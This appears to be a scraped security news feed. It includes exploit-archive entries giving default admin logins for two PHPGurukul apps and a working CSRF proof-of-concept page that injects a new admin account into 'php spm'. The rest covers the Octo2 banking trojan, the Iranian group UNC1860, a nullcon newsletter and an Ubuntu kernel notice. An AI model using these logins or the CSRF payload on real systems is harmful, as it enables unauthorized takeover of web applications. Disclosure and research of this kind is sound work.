Rail Pass Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Rail Pass Management System 1.0 Insecure Settings Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/rpms/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Rail Pass Management System 1.0 Insecure Settings

PreSchool Enrollment System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : PreSchool Enrollment System 1.0 Insecure Settings Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/pre-school-enrollment-system-using-php-and-mysql/                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/preschool/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

PreSchool Enrollment System 1.0 Insecure Settings

PHP SPM version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : php spm 1.0 CSRF Add Admin Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject new admin account.[+] Line 6 Set your Target.[+] Line 15+19 Set your user & pass.[+] save payload as poc.html[+] payload :<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/php-spms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

PHP SPM 1.0 Cross Site Request Forgery

Cybersecurity researchers have discovered a new version of an Android banking trojan called Octo that comes with improved capabilities to conduct device takeover (DTO) and perform fraudulent transactions.
The new version has been codenamed Octo2 by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have

Mobile Security / Cybercrime

Cybersecurity researchers have discovered a new version of an Android banking trojan called Octo that comes with improved capabilities to conduct device takeover (DTO) and perform fraudulent transactions.

The new version has been codenamed **Octo2** by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have been spotted in European countries like Italy, Poland, Moldova, and Hungary.

"The malware developers took actions to increase the stability of the remote actions capabilities needed for Device Takeover attacks," the company said.

Some of the malicious apps containing Octo2 are listed below -

*   Europe Enterprise (com.xsusb\_restore3)
*   Google Chrome (com.havirtual06numberresources)
*   NordVPN (com.handedfastee5)

Octo was first flagged by the company in early 2022, describing it as the work of a threat actor who goes by the online aliases Architect and goodluck. It has been assessed to be a "direct descendant" of the Exobot malware originally detected in 2016, which also spawned another variant dubbed Coper in 2021.

"Based on the source code of the banking Trojan Marcher, Exobot was maintained until 2018 targeting financial institutions with a variety of campaigns focused on Turkey, France and Germany as well as Australia, Thailand and Japan," ThreatFabric noted at the time.

"Subsequently, a 'lite' version of it was introduced, named ExobotCompact by its author, the threat actor known as 'android' on dark-web forums."

The emergence of Octo2 is said to have been primarily driven by the leak of the Octo source code earlier this year, leading other threat actors to spawn multiple variants of the malware.

Another major development is Octo's transition to a malware-as-a-service (MaaS) operation, per Team Cymru, enabling the developer to monetize the malware by offering it to cybercriminals who are looking to carry out information theft operations.

"When promoting the update, the owner of Octo announced that Octo2 will be available for users of Octo1 at the same price with early access," ThreatFabric said. "We can expect that the actors that were operating Octo1 will switch to Octo2, thus bringing it to the global threat landscape."

One of the significant improvements to Octo2 is the introduction of a Domain Generation Algorithm (DGA) to create the command-and-control (C2) server name, as well as improving its overall stability and anti-analysis techniques.

The rogue Android apps distributing the malware are created using a known APK binding service called Zombinder, which makes it possible to trojanize legitimate applications such that they retrieve the actual malware (in this case, Octo2) under the guise of installing a "necessary plugin."

"With the original Octo malware's source code already leaked and easily accessible to various threat actors, Octo2 builds on this foundation with even more robust remote access capabilities and sophisticated obfuscation techniques," ThreatFabric said.

"This variant's ability to invisibly perform on-device fraud and intercept sensitive data, coupled with the ease with which it can be customized by different threat actors, raises the stakes for mobile banking users globally."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Octo2 Android Banking Trojan Emerges with Device Takeover Capabilities

The group has used more than 30 custom tools to target high-value government and telecommunications organizations on behalf of Iranian intelligence services, researchers say.

Source: Christophe Coat via Alamy Stock Photo

An advanced persistent threat (APT) tied to Iran's Ministry of Intelligence and Security (MOIS) is providing initial access services to a bevy of Iranian state hacking groups.

UNC1860 has been the gateway for attacks by notorious groups like Scarred Manticore and OilRig (aka APT34, Helix Kitten, Cobalt Gypsym, Lyceum, Crambus, or Siamesekitten). As Mandiant explained in a recent blog post, its focus is exclusively on breaching and establishing a foothold in potentially valuable networks across high-value sectors — government, media, academia, critical infrastructure, and particularly telecommunications — then handing over access to other Iranian nation-state actors.

Over the years, UNC1860 has teamed up for attacks against targets in Iraq, Saudi Arabia, and Qatar; aided in espionage of Mideast telecommunications companies; prepared the ground for wiper attacks in Albania and Israel; and more.

**UNC1860's Many Backdoors**

In March, Israel's National Cyber Directorate warned that wiper attacks were striking organizations across the country, including managed service providers, local governments, and academic institutions. Among the indicators of compromise (IoCs) were a Web shell called "Stayshante" and a dropper called "Sasheyaway," just two of around 30 custom malware tools managed by UNC1860, the Mandiant report explained.

UNC1860 isn't the one doing the wiping, or any other disruptive, destructive, or otherwise exploitative behavior in a target's network. Its job is merely to gain that initial foothold, primarily by scanning for vulnerabilities in public-facing assets at targeted organizations, then dropping a series of increasingly serious and sophisticated backdoors. 

Stayshante, Sasheyaway, and tools like it provide its first toe in the water, and can be used to download more substantial backdoors like "Templedoor," "Faceface," and "Sparkload." For its highest-value targets, UNC1860 will deploy its most sophisticated, main-stage backdoors like "Templedrop," or "Oatboat," which loads and executes payloads such as "Tofupipe" and "Tofuload," TCP-based passive listeners.

"To set up those listeners, they are not even leveraging regular Windows API calls — they actually leverage some undocumented tools of HTTP.sys, which is crazy," says Stav Shulman, senior researcher with Mandiant by Google Cloud.

"Most backdoors would leverage common API calling, so most engines would detect them," Shulman explains. "But if you are determined enough, and clever enough, and if you have extraordinary technical knowledge, you can leverage calls that are not documented by the Microsoft Developer Network (MSDN). So UNC1860 actually reverse engineered them themselves, so that you won't detect their calls."

**UNC1860's Trick to Staying Undetected**

Besides its lack of destructive behavior, there's another reason why you hear about Scarred Manticore, Oil Rig, and Shrouded Snooper, but rarely UNC1860: All of UNC1860s implants are entirely passive. It doesn't send any information out from target networks, and doesn't need to maintain any kind of command-and-control (C2) infrastructure.

"Most detections today are very focused on outbound communications, but UNC1860 just focuses on inbound requests," Shulman says. "That inbound traffic they listen to can come from any number of stealthy sources \[including\] VPN nodes in proximity to the target, other victims of prior attacks, and other locations in a target's network."

In 2020, for example, the group was observed using one of its victims' networks as a launch point to scan for potentially vulnerable IP addresses in Saudi Arabia, vet various accounts and email addresses associated with domains in Saudi Arabia in Qatar, and target VPN servers in the same region.

And, as Shulman notes, "To escalate the operation, they only need to send one command at any random point in time to activate the backdoor." Because the group's implants utilize HTTPS-encrypted traffic, victims will not be able to decrypt its commands or payloads.

Shulman advises organizations to focus on how best to vet incoming network traffic.

"How do we detect \[malicious traffic\]? How do we decide if incoming traffic is malicious or not?" Shulman says. "Because even \[when UNC1860 is abusing\] documented API calls that cybersecurity engines would catch, there's plenty of legitimate software that use these same calls, so detecting malicious calls could be very confusing and have lots of false positives. Focusing on the incoming traffic is the key, I think, for detecting UNC1860's activity."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Meet UNC1860: Iran's Low-Key Access Broker for State Hackers

The Call For Papers for nullcon Goa 2025 is now open. Nullcon is an information security conference held in Goa, India. The focus of the conference is to showcase the next generation of offensive and defensive security technology. It will take place March 1st through the 2nd, 2025.

Do you wish to become a speaker at Nullcon Goa 2025? The opportunities are endless. The time to think is long gone - Take the only leap to share your research with our infosec community.

Call For Papers - Nullcon Goa 2025 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3gVDYW7lCdLW6lZ3krW5sVJnn2b1pGgW4VfGFw4gSKwKW7T9v298lCB3rW3MyVZN4QZdRZVmt5bS5SZh7_W1gd6mX1JJnTgW3T-ygY70DWZQN8BqbRky-cK7N78QdcBNhhTdW4S5D_934wdgsW5g4QSF1XLcrBW3xm9qY5Fq0K7W29YBzm5FFJZqW1DbVDt8_D4C-W32Tv4x5mwwtFW3G8VF11yBc2DW2_C3z-89wwR2W44r2CW30gPzPW1LCpQB3TC7rDN2_4JXml3TQNW2sxvNm5d4LyqW91kdFY8BF16dW6B3Ycm8XSXV4W7G9dPx4GkwKZf8kv1DK04 )

OPEN...Call For Papers (CFP) for Nullcon Goa 2025

Do you wish to become a speaker at Nullcon Goa 2025? The opportunities are endless. The time to think is long gone - Take the only leap to share your research with our infosec community.

CFP Closes: 15th November 2024

Conference: 1st-2nd March 2025

Venue: BITS, Goa

Submission Topics (but not limited to):

- IoT/Embedded Security/OT  
- Web Applications / AI Security  
- Browser Security  
- Fuzzing & Exploit Development  
- Bug Hunting and Vulnerability Research  
- Forensic  
- Malware & Incident Response  
- Cloud and Infrastructure Security

Know More About Speaker Benefits / Submission Guidelines  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3gVDYW7lCdLW6lZ3krW5sVJnn2b1pGgW4VfGFw4gSKwKW7T9v298lCB3rW3MyVZN4QZdRZVmt5bS5SZh7_W1gd6mX1JJnTgW3T-ygY70DWZQN8BqbRky-cK7N78QdcBNhhTdW4S5D_934wdgsW5g4QSF1XLcrBW3xm9qY5Fq0K7W29YBzm5FFJZqW1DbVDt8_D4C-W32Tv4x5mwwtFW3G8VF11yBc2DW2_C3z-89wwR2W44r2CW30gPzPW1LCpQB3TC7rDN2_4JXml3TQNW2sxvNm5d4LyqW91kdFY8BF16dW6B3Ycm8XSXV4W7G9dPx4GkwKZf8kv1DK04 )

Nullcon Bangalore 2024

Learn Via Experiences, Not Just Books

Do you know what today’s cutting-edge tech jobs at major companies truly require?

It’s all about the hands-on expertise you’ve developed—through the projects you’ve undertaken and the practical knowledge needed to address real-world business challenges.

Dates: 7th-9th November 2024 | Venue: Hotel Royal Orchid, Bangalore

Hacking Modern Web Apps: Master the Future of Attack Vectors

By Anirudh Anand & Abraham Aranguren

Malware Analysis 0x65: Dissecting & Demystifying Attackers Mindset

By Abhinav Thakur & Niraj Shivtarkar

Practical IoT Hacking

By Hemant Sonkar, Ranit Pradhan, Pugal Selvan & Rupesh Surve

StealthOps: Red Team Operations 24 Edition

By Manish Gupta & Yash Bharadwaj

Sold Out! AI Security: Terminating The Terminator

By Nikhil Joshi

Register with Early Bird Discount!  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3gVDYW7Y8-PT6lZ3pcW5Z_6zg6bPGw2N6gYMkp15jT0W94QVDk5P5PGyW3BDWFv8GSrP3W72QF1V8zzkJNW72brp-6RfrTGW7F0XXD8X5WVcVQfWd_4HT-BxW1m36Rn7gDN4zW47VSWV8yk5TPN667G5NY2gy8W68yBjv4PZ9THW8rPGRk5k34v2W2KnQWS8y9qwDVPwXGw95657DW8xQm9N1LRLCMN3-7DJW3WTcGW4cdvMh89YnKQW6yx1R52qBcnPW10Yff22vQrxhW7x0pkw35WfrrN7tnpf5GJMDfW9dmylv4bzq_6W16R0NG98-VTfW3mXFMM77D_mNW8HbkFz30psD8f7kC9fg04 )

Job Openings 💼

Evernorth Health Services is looking for a Cyber Security Senior Advisor (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3lcq-W7Y8-PT6lZ3mKVxYnF46myHbmVmLD9799wBlpW3V-q831YL_kjW6mZcrB1_s4MmVddB_T60XB9QW7tCfZ13Rd87YW6yYyk-4rqZrqW7XZc046p4cynW1HYc_Q788LnWW60HDdD3VJq12W4CJys-8r4d8dW6YjvF25hsLpmW8xPbw63Z14grW51l1tj3NRGpqW4t6HCC8wl_JdW87p0H610_QYZW2nYpRK88rGG8W2Tvq145BNTtYW7t0Hqr1lmbz3W7Gp8Yt3w6F4qW1xPB-28bMCxqVJm8ZP6Zs0mqW5gP7mz9dl99XN1N1pB2ftxQ3W7c_Hg75vtHfYVXdncG5_P77pf2LHb7g04 ) and a Cyber Security Associate Principal (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3lcq-W7Y8-PT6lZ3q7W69Cbdx3b0ZPmN1txRLMr9jfGW8YlfXJ1t2SZbW7jqJs02dS2jYW3lB4Tf2H7CdyW8cKyQr2xJjkdW4ssmfL7d5VzZW1jCqVN3sT8STN3ggNMXxz7CyW1QMJl43BNt8_W6wds4T8BTMsVVtkX2812bpl_W5TGFq43tyJ14W5QN2MZ8gWVPfW6RGlK55JkqxgW3zBXk38Yh9JFW1B4LC76pT6GvW4Gg4YR7Ht5yVW7SsDDh2Cf737My2j9mKT9PfW8sj_1-4cpFbXW1_R_5y3nmwcBN2flG7Qs29d0W3DHv8f6018g2W47lJ1m5NB8dfW78qmSX3lK69Hd5c1WH04 ) in Hyderabad, India

Google is looking for a Security Engineer, Android Security Assurance (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_H5jMY8W69t95C6lZ3pgW7CTQgt6mr-qhW6jgM7f1-TYgNW37sGhY6Fw_MhW3W5hJT3q8xHNW7Dshmj63jCQfMBf7qFzVDkGV1Nwnq1GnCRDW53kp827KkSHjW4kSz1b8DYx2KW33j2fs8ZVDgVW6Ksb1-8_BL3XW4p38gd23RL8lW8Rxnqg1x39n4W8grlTQ89hWP9W7BMh8L22G3RGW72X6Xh7glvrQW1GrZn127P4BlW6ldgZ72C4z86W6f-mJf4sGn7BW84VW45328XTZW7mHvgT82H0HvW7fg1jB43mhcLW6-Vfwl28QHmsW3x1pKc88p20dW3XT4xj1yH5f5W37d9Cp2lWLKgW9612FS8_SBfpW5RwJSL7xH16WW4kzq758RwLFSW5S-KcT7J59fNN9kkyZKPF3VfW7T37gM6tYfQDW3bCHmt4S12ZtV6zTbL4L3yr5W3J9mvh4pvbFmW4gVFgc8BwKzFf7w0CsC04 ) in Bangalore, India

InfoSec Connect 👥

null - The Open Security Community is preparing for its upcoming elections! Submit your questions for potential candidates via GitHub: https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_45jMY8W50kH_H6lZ3nvN6Xjl9sXkG90W2YkM_32MTqcxW1GZ2sN4wrQnSW2MGhLx1HYpzyW3gNZtH6T485gVknDzC25Sd7qN6b5t28nrKr4W3gpbhd3nwn5WV96_Nm3wmknhVMX33f2FSw14W5Dq1c75rZTHrW1BKqQT226pSDW2c8B5x16ZcJlW3Kbsyq7g5h-nW8cxfDh1Z1skqW1-QxmT2TkctBW4lCMsm1JCJKmW2MqFJL6V9f0cW5pTyB58RPzhqVRSzQw4g7L1CW4r5ZPQ86cV4wW1rJR6-59ZLWtW6VbG5L6-nMrwW2mNc4H8mM6mQW4GGGP131VbgPW3yWQRh7nTz3DW6QBMq33CSHM7W1dSpvK4tR352W8G30__4P4bgyW6s00nG1lcZyZW69VQJr1j0W5WW1bz5KK62QJstf29fj5P04 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_45jMY8W50kH_H6lZ3nvN6Xjl9sXkG90W2YkM_32MTqcxW1GZ2sN4wrQnSW2MGhLx1HYpzyW3gNZtH6T485gVknDzC25Sd7qN6b5t28nrKr4W3gpbhd3nwn5WV96_Nm3wmknhVMX33f2FSw14W5Dq1c75rZTHrW1BKqQT226pSDW2c8B5x16ZcJlW3Kbsyq7g5h-nW8cxfDh1Z1skqW1-QxmT2TkctBW4lCMsm1JCJKmW2MqFJL6V9f0cW5pTyB58RPzhqVRSzQw4g7L1CW4r5ZPQ86cV4wW1rJR6-59ZLWtW6VbG5L6-nMrwW2mNc4H8mM6mQW4GGGP131VbgPW3yWQRh7nTz3DW6QBMq33CSHM7W1dSpvK4tR352W8G30__4P4bgyW6s00nG1lcZyZW69VQJr1j0W5WW1bz5KK62QJstf29fj5P04 ) . Your feedback will help shape the future leadership of null.

Join our Discord Server 👋

Stay updated on the latest job announcements and opportunities in our community: https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3lcq-W7lCdLW6lZ3mSN1rYPzdwB9mRW8bnZP19gYljkW61XSF-5lbBSDW9kRgZ5783hndW7SQScW9dHfnWW24cg8-7g1k4tW5MTCDT39Z25lW6B9t5D3bQFsyW8DLY3H62sFsJN6H1_wpzsHKwW1y0WS-2wXgQTW2HQqNr6nlrmQW7HTlkS2blydMN8G5hm1QFTtVN1_hWxtMsgwfW3T9hgM6W-77GW7F6HKs2_y5v6W52Pvs334vlqGW7R9pjv3hSK7RW5jH-pH6bx5tJW7JzvfR3pTj-vW8MP7m21-hdg5W8j5w9p3Hp3HcW3k67C68Fjz63f5xvHfF04 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3lcq-W7lCdLW6lZ3mSN1rYPzdwB9mRW8bnZP19gYljkW61XSF-5lbBSDW9kRgZ5783hndW7SQScW9dHfnWW24cg8-7g1k4tW5MTCDT39Z25lW6B9t5D3bQFsyW8DLY3H62sFsJN6H1_wpzsHKwW1y0WS-2wXgQTW2HQqNr6nlrmQW7HTlkS2blydMN8G5hm1QFTtVN1_hWxtMsgwfW3T9hgM6W-77GW7F6HKs2_y5v6W52Pvs334vlqGW7R9pjv3hSK7RW5jH-pH6bx5tJW7JzvfR3pTj-vW8MP7m21-hdg5W8j5w9p3Hp3HcW3k67C68Fjz63f5xvHfF04 )

Payatu Technologies Pvt Ltd., Office No. 502, Tej House, 5th Floor, 5 M.G. Road, Camp, Pune, Maharashtra 411001

Unsubscribe (https://hs-7328024.s.hubspotstarter.net/preferences/en/unsubscribe?data=W2nXS-N30h-BrW3LHlhC34rt-5W2qSxDn2q_nGsW2nTBZy1-XBPFW3DXWqr3Z-_tCW2WqQ3730GyvSW1S2hF03835hXW2YyfNm3JSNdZW2zYXgc24WzKdW2Pvm-h4fsmRdW43F1K13M62zMW2RrG9Z2Wy8kHW4mbnlg3dsp0fW4pyH862313-zW1Bczj53T5WDMW4mytFw45XcXLW3jdkps3_YkSJW32xGwS1ZqWrgW4pB1tk4rvDxMW3QRD2L4tFmCcW3z2X5n4cKGJ8W1_jPkL3DYJ5pW1L7shZ3yXrT1W3gs6ks2HFWFSW4mGpm92TMWDSW32rKK32sVklYW2zPb-71Lmv6XW2CqPVY3T47WMW2sT7Py49TPG1W2RJTzl4mtnMjW1Zgz8l4ftc1FW3XyTv52KSvkzW30c2cn2-g8DjW2sFqnF3Vz5zYW2Ry1N61Ljfl0W3K6FDF1BDJp3W2KZkNq3bcfRYW41tWSP1L3Gn_W49tXYY3ggbJZW2TjQnn3f-nvYW4mrF_s4fnXVLW1ZljCP2qVBl7W3W2mYG4fr5PdW2TzZDB36Fsy4W4cPR5w2PsLMfW3dppWB4mstSlW47wtPz1_nZN9W3H6XWj3C89-df1ZvBy304&_hsenc=p2ANqtz-_4kDnRpYLE-TWAHbI6iNAV0yfG-pGLSCVy_UhGcPYKKegnkWd5NrsrumPiy2SzOiKwRWd8iI3lUz1brTj75EqS1ofT1uSnLYe5ip-U8gHYAz8qiaI&_hsmi=325820415 )  
Manage preferences (https://hs-7328024.s.hubspotstarter.net/preferences/en/manage?data=W2nXS-N30h-BrW3LHlhC34rt-5W2qSxDn2q_nGsW2nTBZy1-XBPFW3DXWqr3Z-_tCW2WqQ3730GyvSW1S2hF03835hXW2YyfNm3JSNdZW2zYXgc24WzKdW2Pvm-h4fsmRdW43F1K13M62zMW2RrG9Z2Wy8kHW4mbnlg3dsp0fW4pyH862313-zW1Bczj53T5WDMW4mytFw45XcXLW3jdkps3_YkSJW32xGwS1ZqWrgW4pB1tk4rvDxMW3QRD2L4tFmCcW3z2X5n4cKGJ8W1_jPkL3DYJ5pW1L7shZ3yXrT1W3gs6ks2HFWFSW4mGpm92TMWDSW32rKK32sVklYW2zPb-71Lmv6XW2CqPVY3T47WMW2sT7Py49TPG1W2RJTzl4mtnMjW1Zgz8l4ftc1FW3XyTv52KSvkzW30c2cn2-g8DjW2sFqnF3Vz5zYW2Ry1N61Ljfl0W3K6FDF1BDJp3W2KZkNq3bcfRYW41tWSP1L3Gn_W49tXYY3ggbJZW2TjQnn3f-nvYW4mrF_s4fnXVLW1ZljCP2qVBl7W3W2mYG4fr5PdW2TzZDB36Fsy4W4cPR5w2PsLMfW3dppWB4mstSlW47wtPz1_nZN9W3H6XWj3C89-df1ZvBy304&_hsenc=p2ANqtz-_4kDnRpYLE-TWAHbI6iNAV0yfG-pGLSCVy_UhGcPYKKegnkWd5NrsrumPiy2SzOiKwRWd8iI3lUz1brTj75EqS1ofT1uSnLYe5ip-U8gHYAz8qiaI&_hsmi=325820415 )

nullcon Goa 2025 Call For Papers

Ubuntu Security Notice 7028-1 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    =========================================================================Ubuntu Security Notice USN-7028-1September 23, 2024linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp,linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash).Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Greybus drivers;  - Modular ISDN driver;  - Multiple devices driver;  - Network drivers;  - SCSI drivers;  - VFIO drivers;  - F2FS file system;  - GFS2 file system;  - JFS file system;  - NILFS2 file system;  - Kernel debugger infrastructure;  - Bluetooth subsystem;  - IPv4 networking;  - L2TP protocol;  - Netfilter;  - RxRPC session sockets;(CVE-2024-42154, CVE-2023-52527, CVE-2024-26733, CVE-2024-42160,CVE-2021-47188, CVE-2024-38570, CVE-2024-26851, CVE-2024-26984,CVE-2024-26677, CVE-2024-39480, CVE-2024-27398, CVE-2022-48791,CVE-2024-42224, CVE-2024-38583, CVE-2024-40902, CVE-2023-52809,CVE-2024-39495, CVE-2024-26651, CVE-2024-26880, CVE-2024-42228,CVE-2024-27437, CVE-2022-48863)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-4.15.0-1135-oracle  4.15.0-1135.146          Available with Ubuntu Pro  linux-image-4.15.0-1156-kvm     4.15.0-1156.161          Available with Ubuntu Pro  linux-image-4.15.0-1166-gcp     4.15.0-1166.183          Available with Ubuntu Pro  linux-image-4.15.0-1173-aws     4.15.0-1173.186          Available with Ubuntu Pro  linux-image-4.15.0-1181-azure   4.15.0-1181.196          Available with Ubuntu Pro  linux-image-4.15.0-229-generic  4.15.0-229.241          Available with Ubuntu Pro  linux-image-4.15.0-229-lowlatency  4.15.0-229.241          Available with Ubuntu Pro  linux-image-aws-lts-18.04       4.15.0.1173.171          Available with Ubuntu Pro  linux-image-azure-lts-18.04     4.15.0.1181.149          Available with Ubuntu Pro  linux-image-gcp-lts-18.04       4.15.0.1166.179          Available with Ubuntu Pro  linux-image-generic             4.15.0.229.213          Available with Ubuntu Pro  linux-image-kvm                 4.15.0.1156.147          Available with Ubuntu Pro  linux-image-lowlatency          4.15.0.229.213          Available with Ubuntu Pro  linux-image-oracle-lts-18.04    4.15.0.1135.140          Available with Ubuntu Pro  linux-image-virtual             4.15.0.229.213          Available with Ubuntu ProUbuntu 16.04 LTS  linux-image-4.15.0-1135-oracle  4.15.0-1135.146~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-1166-gcp     4.15.0-1166.183~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-1173-aws     4.15.0-1173.186~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-1181-azure   4.15.0-1181.196~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-229-generic  4.15.0-229.241~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-229-lowlatency  4.15.0-229.241~16.04.1          Available with Ubuntu Pro  linux-image-aws-hwe             4.15.0.1173.186~16.04.1          Available with Ubuntu Pro  linux-image-azure               4.15.0.1181.196~16.04.1          Available with Ubuntu Pro  linux-image-gcp                 4.15.0.1166.183~16.04.1          Available with Ubuntu Pro  linux-image-generic-hwe-16.04   4.15.0.229.241~16.04.1          Available with Ubuntu Pro  linux-image-gke                 4.15.0.1166.183~16.04.1          Available with Ubuntu Pro  linux-image-lowlatency-hwe-16.04  4.15.0.229.241~16.04.1          Available with Ubuntu Pro  linux-image-oem                 4.15.0.229.241~16.04.1          Available with Ubuntu Pro  linux-image-oracle              4.15.0.1135.146~16.04.1          Available with Ubuntu Pro  linux-image-virtual-hwe-16.04   4.15.0.229.241~16.04.1          Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7028-1  CVE-2021-47188, CVE-2022-48791, CVE-2022-48863, CVE-2023-52527,  CVE-2023-52809, CVE-2024-26651, CVE-2024-26677, CVE-2024-26733,  CVE-2024-26851, CVE-2024-26880, CVE-2024-26984, CVE-2024-27398,  CVE-2024-27437, CVE-2024-38570, CVE-2024-38583, CVE-2024-39480,  CVE-2024-39495, CVE-2024-40902, CVE-2024-42154, CVE-2024-42160,  CVE-2024-42224, CVE-2024-42228

Ubuntu Security Notice USN-7028-1

Linux i915 suffers from an out-of-bounds PTE write in vm_fault_gtt() that leads to a PTE use-after-free vulnerability.

